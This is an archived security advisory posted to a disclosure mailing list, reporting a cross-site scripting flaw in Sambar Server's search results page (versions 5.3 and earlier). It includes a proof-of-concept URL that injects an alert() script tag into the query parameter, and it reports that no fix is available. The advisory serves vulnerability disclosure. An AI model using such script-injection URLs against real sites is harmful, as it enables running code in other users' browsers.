lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <00ce01c2bffd$61ec6a70$0300a8c0@galiarept>
From: galiarept at security-corp.org (galiarept [security-corp])
Subject: .: Sambar Server Cross-Site Scripting vulnerability :.

.: Sambar Server Cross-Site Scripting vulnerability :.
________________________________________________________________________

Security Corporation Security Advisory [SCSA-001]
________________________________________________________________________

PROGRAM: Sambar Server
HOMEPAGE: http://www.sambar.com/
VULNERABLE VERSIONS: 5.3 and prior
________________________________________________________________________


DESCRIPTION
________________________________________________________________________

"Sambar Server is the new standard in high performance multi-functional
servers with features rivaling other commercial products selling
separately for several hundreds of dollars. It's Winsock2 compliant Win32
 integration functions on Windows 95, Windows 98, Windows NT, Win2000,
and XP as a service or as an application."
(direct quote from http://sambar.jalyn.net)


DETAILS
________________________________________________________________________


An exploitable bug was found on Sambar Server which cause javascript
execution on client's computer by following a crafted url.

This kind of attack known as "Cross-Site Scripting Vulnerability" is
present in search section of the web site, anyone can input specially
crafted links and/or other malicious scripts.


EXPLOITS
________________________________________________________________________


http://localhost/search/results.stm?query=<script>alert('Test%20of%20vulnera
bility');</script>


SOLUTIONS
________________________________________________________________________

No solution for the moment.


VENDOR STATUS
________________________________________________________________________

Sambar has been contacted.


------------------------------------------------------------------
Gr?gory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
------------------------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ